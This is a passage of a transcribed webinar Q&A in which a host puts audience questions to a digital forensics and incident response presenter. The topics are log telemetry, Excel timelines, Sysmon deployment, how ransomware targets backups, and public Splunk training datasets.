Like could be from the network, it could be from pcaps or from network logs or from, events that are happening on windows or windows systems or from, actually logs.

And logs are basically just logs that applications would write to, right? You do not see anything that’s going on on a system. And if you’re just looking at logs, it’s just the things that the system decides to log based on its configuration.

So windows has event logs and there’s just some information in there. any web servers have logs and you can look into those logs. but unless they’re not configured accurately, you might still be missing things.

There might be additional telemetry, so additional data that you might need visibility into. Not everything is in logs. You might have to parse, you might have to gain pcaps or networking data is a good example of additional telemetry, for example.

Zach Hill

Thank you. no, definitely, it was, cat meow asks, why do you say excel is the most powerful tool to analyze timelines?

Markus Schober

Yeah, I love, building timelines in, excel. You can sort, you can filter, you can list, you can sort chronologically, you can, highlight certain artifacts and you can actually, and so this is what you do in forensics.

You just have data from a lot of different outputs. For example, just speaking of, Eric Zimmerman tools, you might parse the MFT, then you might parse event logs, then you might be parsing registry data.

There’s all kinds of different data that you get there. You need to put them into one pane of glass at some point in one view.

Spreadsheets, obviously, because most outputs are CSV based anyways, you just copy and paste and make three gb anti grade rows. that’s basically in forensics world, how it mostly works out.

You put all the data within a spreadsheet timeline and then, see, and this is my favorite part, I just put all the data in there and then I just sort it by time and all of a sudden all the things fall in place and I can exactly see what happened when, where and how.

And, that’s always pretty rewarding. Forensics people are just also excel nerds, I guess, long story short.

Zach Hill

So checking out, YouTube, somebody was saying we’re getting an error. I was just looking at that. My apologies. thank you for that answer, man. And let’s see, Michael is asking, would you recommend using encase or learning it.

Markus Schober

I think of course it can be really helpful for you to get st case is very powerful. But most part I’m not talking about e discovery or anything where it might even, be needed to spend a ton of days on a certain investigation.

Zach Hill

Solid. did you cover the storage space that was needed in the VMsheen? Tony was asking, I’m not sure if you had how much storage they needed for collecting and everything.

Markus Schober

so storage space for the labiums? Yes, you can see labium. So just the bare minimum. You can run a Windows server and a Windows client and allocate maybe 30gb of storage the entire system here with the setup that you see right now.

you definitely need 100 gigs, but that’s probably already doable there. And then it depends on how you perform data collections. If you create disk images from each of this system, you’re automatically doubling every disk image, the size of the disk image like you.

All of a sudden you have two images with 30gb of size and then it can become big really quick. And that’s why forensic workstation actually often have to be pretty big because you have to host the disk image that you just captured from another system on your own system.

So it has to be bigger than that. Of course.

Zach Hill

in the ransomware attack lifecycle where in the process are backups detected and eliminated?

Markus Schober

I guess that is a good question. I think it depends on whether they come across it manually or not. So there’s I think two options.

Either a threat actor finds out about a system that might, or about a tool that is performing backups and they might manually be able to target it somewhere here in the post exploitation phase and wipe them, delete them, whatever they might be able to do based on the permissions, privileges, accounts that they got a hold of.

Or there’s also then the ransomware that has the capability of typically of deleting for example, shadow copies. And shadow copies are the automatic backups that windows would do on its own system so that you can actually kind of create a timeline and go back in time, if something happens.

And most ransomware these days, actually for most of the power, actually ransomware has the capability of deleting. shadow cop is on the Windows system that it would execute on automatically.

Zach Hill

This person asked, everyone talks about Windows forensics but no talk about Linux. Any reason?

Markus Schober

Yeah, because it happens at like 95% of my cases that it was Windows based. And every organization runs on Windows for the most part, obviously I notice exceptions, but I’m just saying generally a ransomware case mostly out there involves enterprise environments that also run on Windows.

And I can even think about a single case that I’ve worked in my life that involved a ransomware attack on a purely Mac or Linux based environment.

And so it’s just what you’re basically dealing with for the most part.

Zach Hill

Rick, thank you, man. good question.

Markus Schober

I know it seems very, very biased for sure.

Zach Hill

do you have time for a couple more questions?

Markus Schober

Yeah, of course.

Zach Hill

All right, so if anybody has any more questions, please put them in the chat. But I’m going to finish up these last two that I see here. Or last one, from a hypervisor layer, is there some tool you would recommend to monitor the virtualization layer?

Markus Schober

M not sure if I understand the question. Right. to monitor, I guess, hypervisors are basically, you can use virtualbox, hyper, VMware, anything along those lines.

I don’t know what you would monitor on the virtualization layer, so I’m not exactly sure about the question.

Zach Hill

No problem. Can, we say that sysmon will give then a more complete logging rather than just local policy logging?

Markus Schober

Oh, for sure, yeah, sysman is, if you have sysman, and there’s a lot, you can basically see almost everything you need to see if you have it perfect. If you have it accurately configured.

I would take Sysman logging over anything, anytime because sysman logs so much information, so much granular information that most of the time it renders windows forensics to process afterwards useless because you already have all the answers in Sysmon.

So as long as you have sysmon logs about for a particular timeframe of, interest, almost everything is already there. There’s most of the time no need to even follow up with forensics because you already have your questions there.

Zach Hill

Not sure on this question. are there any certain device types, DC’s that you’d recommend enabling Sysmon on first?

Markus Schober

yeah, so I think I know what this question is going to. So I would enable Sysmon. If notice there’s always this debate. Sysmon is creating a lot of logs and it has a lot of needs, a lot of storage, there’s a lot of data.

And if you especially ship it to the sim, that’s always a debate where it is getting expensive and it’s too much data. We don’t need that. So there’s always a back and forth about that and every organization has to decide it on their own.

But my recommendation is definitely put Sysman on critical systems, sensitive systems, where you really want to see if something gets compromised. Somebody got access or shouldn’t someday.

Files were created, deleted, or whatever. They definitely put sysmon, at least on those systems. If you can at least forward those logs to the sim. If you can’t. There’s nothing wrong.

There’s nothing wrong with just installing system on endpoints and not forwarding system unlocks, because I would rather take a compromised system with some local sysmon logs on it if I need to.

then not, everybody nowadays has 100 megabyte or so of size, spare, disk to have a log or, like, sysmon be run locally and just, have it around, for a period of time.

Zach Hill

Perfect. Thank you, sir. I’m, going to take this last question here, and then if you have any more questions for Marcus, I’ll go ahead and put his discord link in the, into our discord server so you guys can, go and join that and ask him questions if you have any more.

but, this is actually a pretty good question. Are there any publicly available data, that could be used to learn analysis using splunk? If there are any pre configured data sets for that.

Perfect.

Markus Schober

Yes. let me see if I can actually dig that up here real quick.

There’s a, splunk bots something. Splunk boss of the sock.

Zach Hill

Check out splunk boss of the sock. Is that what you said?

Markus Schober

boss of the sock? That’s this. And this is a, challenge that splunk put out the security team for years, and they actually created a ton of splunk logs, every year.

And you can download those for free from the GitHub and put it into your splunk and have aws compromise. you can have, There’s, like. I don’t know, there’s, like, a dozen different, things you can actually look into there.

I’ve played around with it for a little while, and I’ve only gotten, like, scratch the surface of it, but this is. Yeah, logs. I know, data for training is always the most, is, like, the golden in our, industry, right?

You need data to actually investigate something. And this is why it’s so tricky to learn. And this is why I wanted to do this talk. Because if you have your own lab, you can create your own data, right? And this is where you have splunk.

And if you have sysmon, you can run sysmon queries. In splunk. But if you want to go even further. Yeah. This, splunk, boss of the soc, download the data, put it into your splunk. It’s pretty easy. You can just import it and, Yeah, just know it out.

And there’s actually write up guides. There’s guides out there that have the question and answers out there.

Zach Hill

That’s awesome. I, put a link for that in the discord chat, so if you guys want to check that out, you, can find the link there. Dude, thank you. That’s a. Such an awesome resource right there.

I had no idea that existed. So that’s legit.

Markus Schober

Awesome.

Zach Hill

All right, well, thank you for being here again and sharing your time with us, Marcus. Always appreciate you, being here with us. you’ll be joining us at wild west hacking fest in Denver, and I, Deadwood.

So we will also see you there. virtual? No, you’ll be in person training in Denver. Yep.

Markus Schober

Oh, yes.

Zach Hill

Okay. Awesome. Awesome. All right, so to everybody who, was here for, the presentation, say thank you to Marcus, because we appreciate you. We love you. Thanks.

Markus Schober

You’re welcome.

Zach Hill

If you are here and you still want to ask some questions, we are going to be starting our breakout room. So if you have the zoom, application installed at the bottom of your screen, you should see a little button that says breakout rooms.

And in there, you should see ask anti siphon anything. I don’t believe Marcus will be joining us because he’s probably really tired and wants to go to sleep.

Markus Schober

I’ll get over there for a few minutes, because, actually, I head out later, too, so I still. I’m not taking a break here.

Zach Hill

Perfect. All right, so if you have some, few remaining questions for Marcus, more than welcome to join us. If you have any other questions related to anti siphon training or certifications or resume help, interview, help, whatever that question might be, come join us.

Ask us anything. but until I guess, we see next week, we’ll be here next week with Dale Hobbs. So see you all next week, and, I’ll see you in the breakout room.